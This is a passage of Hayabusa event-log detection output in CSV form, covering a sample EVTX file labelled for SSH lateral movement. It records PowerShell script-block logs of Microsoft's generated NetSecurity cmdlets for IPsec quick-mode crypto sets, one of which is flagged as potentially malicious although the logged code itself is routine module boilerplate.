)) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and 